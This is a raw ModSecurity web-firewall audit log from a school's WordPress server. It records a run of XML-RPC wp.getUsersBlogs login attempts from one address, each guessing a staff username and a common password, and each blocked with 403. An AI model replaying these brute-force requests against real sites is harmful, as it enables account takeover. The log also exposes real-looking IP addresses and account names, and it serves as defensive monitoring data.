103.236.140.4 50190 103.236.140.4 8181 --5acec148-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5acec148-C-- wp.getUsersBlogs wakakur 555555 --5acec148-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5acec148-E-- --5acec148-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284675272741 5038 (- - -) Stopwatch2: 1749284675272741 5038; combined=3894, p1=513, p2=3203, p3=0, p4=0, p5=104, sr=84, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5acec148-Z-- --0215d449-A-- [07/Jun/2025:15:25:35 +0700] aEP3f_ClubEPOra_8UkF4QAAAAo 103.236.140.4 51764 103.236.140.4 8181 --0215d449-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0215d449-C-- wp.getUsersBlogs wakakur Sample123 --0215d449-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0215d449-E-- --0215d449-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284735516320 5277 (- - -) Stopwatch2: 1749284735516320 5277; combined=4027, p1=487, p2=3323, p3=0, p4=0, p5=123, sr=124, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0215d449-Z-- --64428849-A-- [07/Jun/2025:15:26:35 +0700] aEP3u_ClubEPOra_8UkGUAAAABI 103.236.140.4 53366 103.236.140.4 8181 --64428849-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --64428849-C-- wp.getUsersBlogs wakahumas Pakarmy@0882 --64428849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64428849-E-- --64428849-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284795234107 4684 (- - -) Stopwatch2: 1749284795234107 4684; combined=3374, p1=488, p2=2677, p3=0, p4=0, p5=121, sr=84, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64428849-Z-- --66ea6238-A-- [07/Jun/2025:15:27:35 +0700] aEP39xK9gc79coX6mHSJNgAAAFI 103.236.140.4 54978 103.236.140.4 8181 --66ea6238-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --66ea6238-C-- wp.getUsersBlogs wakahumas manutd --66ea6238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ea6238-E-- --66ea6238-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284855218809 5377 (- - -) Stopwatch2: 1749284855218809 5377; combined=3852, p1=463, p2=3175, p3=0, p4=0, p5=123, sr=87, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ea6238-Z-- --490dae77-A-- [07/Jun/2025:15:28:35 +0700] aEP4M_ClubEPOra_8UkHYAAAAA0 103.236.140.4 56660 103.236.140.4 8181 --490dae77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --490dae77-C-- wp.getUsersBlogs wakahumas 1g2w3e4r --490dae77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --490dae77-E-- --490dae77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284915109084 5084 (- - -) Stopwatch2: 1749284915109084 5084; combined=3738, p1=515, p2=3051, p3=0, p4=0, p5=100, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --490dae77-Z-- --2e7bdd3c-A-- [07/Jun/2025:15:29:35 +0700] aEP4b2COO9DrcKL2J_73KQAAANc 103.236.140.4 58350 103.236.140.4 8181 --2e7bdd3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2e7bdd3c-C-- wp.getUsersBlogs wakahumas marketing2021_ --2e7bdd3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e7bdd3c-E-- --2e7bdd3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (99+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284975287722 5650 (- - -) Stopwatch2: 1749284975287722 5650; combined=4194, p1=604, p2=3415, p3=0, p4=0, p5=104, sr=98, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e7bdd3c-Z-- --e19bf954-A-- [07/Jun/2025:15:30:35 +0700] aEP4q5ANhDjQAvBdMyHYrwAAAI4 103.236.140.4 59792 103.236.140.4 8181 --e19bf954-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e19bf954-C-- wp.getUsersBlogs wakahumas P@$$word --e19bf954-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e19bf954-E-- --e19bf954-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (96+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285035198971 3125 (- - -) Stopwatch2: 1749285035198971 3125; combined=2382, p1=288, p2=1978, p3=0, p4=0, p5=68, sr=50, sw=48, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e19bf954-Z-- --5a8d0654-A-- [07/Jun/2025:15:31:35 +0700] aEP452COO9DrcKL2J_73_gAAANg 103.236.140.4 33276 103.236.140.4 8181 --5a8d0654-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5a8d0654-C-- wp.getUsersBlogs wakahumas Daniel --5a8d0654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a8d0654-E-- --5a8d0654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285095656577 4807 (- - -) Stopwatch2: 1749285095656577 4807; combined=3805, p1=436, p2=3174, p3=0, p4=0, p5=112, sr=93, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a8d0654-Z-- --a1efeb5b-A-- [07/Jun/2025:15:32:36 +0700] aEP5JPClubEPOra_8UkJqgAAABc 103.236.140.4 35106 103.236.140.4 8181 --a1efeb5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a1efeb5b-C-- wp.getUsersBlogs wakahumas 1qaz@2wsx --a1efeb5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1efeb5b-E-- --a1efeb5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285156042914 5072 (- - -) Stopwatch2: 1749285156042914 5072; combined=3708, p1=464, p2=3074, p3=0, p4=0, p5=99, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1efeb5b-Z-- --5ca8640a-A-- [07/Jun/2025:15:33:40 +0700] aEP5ZPClubEPOra_8UkKOQAAAAM 103.236.140.4 37292 103.236.140.4 8181 --5ca8640a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5ca8640a-C-- wp.getUsersBlogs wakahumas cluster --5ca8640a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca8640a-E-- --5ca8640a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (56+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285220097505 5816 (- - -) Stopwatch2: 1749285220097505 5816; combined=4322, p1=525, p2=3614, p3=0, p4=0, p5=108, sr=94, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca8640a-Z-- --ca303722-A-- [07/Jun/2025:15:34:40 +0700] aEP5oBK9gc79coX6mHSL3wAAAEs 103.236.140.4 39176 103.236.140.4 8181 --ca303722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ca303722-C-- wp.getUsersBlogs wakahumas toos --ca303722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca303722-E-- --ca303722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285280233835 5444 (- - -) Stopwatch2: 1749285280233835 5444; combined=3739, p1=487, p2=3072, p3=0, p4=0, p5=105, sr=80, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca303722-Z-- --813f6f41-A-- [07/Jun/2025:15:35:41 +0700] aEP53ZANhDjQAvBdMyHbnQAAAJA 103.236.140.4 41180 103.236.140.4 8181 --813f6f41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --813f6f41-C-- wp.getUsersBlogs wakahumas qazxsw --813f6f41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --813f6f41-E-- --813f6f41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285341032388 6389 (- - -) Stopwatch2: 1749285341032388 6389; combined=4367, p1=519, p2=3654, p3=0, p4=0, p5=112, sr=91, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --813f6f41-Z-- --ffa10f1c-A-- [07/Jun/2025:15:35:44 +0700] aEP54PClubEPOra_8UkLYQAAABg 103.236.140.4 41288 103.236.140.4 8181 --ffa10f1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ffa10f1c-C-- wp.getUsersBlogs wakahumas 1234%^&* --ffa10f1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffa10f1c-E-- --ffa10f1c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285344550366 5777 (- - -) Stopwatch2: 1749285344550366 5777; combined=4010, p1=526, p2=3319, p3=0, p4=0, p5=100, sr=93, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffa10f1c-Z-- --9a4e923f-A-- [07/Jun/2025:15:36:41 +0700] aEP6GZANhDjQAvBdMyHcHAAAAIU 103.236.140.4 43128 103.236.140.4 8181 --9a4e923f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9a4e923f-C-- wp.getUsersBlogs wakahumas 212903 --9a4e923f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4e923f-E-- --9a4e923f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285401199104 5049 (- - -) Stopwatch2: 1749285401199104 5049; combined=3579, p1=444, p2=2965, p3=0, p4=0, p5=98, sr=88, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4e923f-Z-- --9bedea60-A-- [07/Jun/2025:15:37:41 +0700] aEP6VWCOO9DrcKL2J_76_wAAAMs 103.236.140.4 45076 103.236.140.4 8181 --9bedea60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bedea60-C-- wp.getUsersBlogs wakahumas loveyou --9bedea60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bedea60-E-- --9bedea60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285461531836 5584 (- - -) Stopwatch2: 1749285461531836 5584; combined=3862, p1=504, p2=3191, p3=0, p4=0, p5=98, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bedea60-Z-- --dbbaef72-A-- [07/Jun/2025:15:38:41 +0700] aEP6kWCOO9DrcKL2J_77jAAAAMQ 103.236.140.4 46800 103.236.140.4 8181 --dbbaef72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dbbaef72-C-- wp.getUsersBlogs wakasarpras wakasarpras1234 --dbbaef72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbbaef72-E-- --dbbaef72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
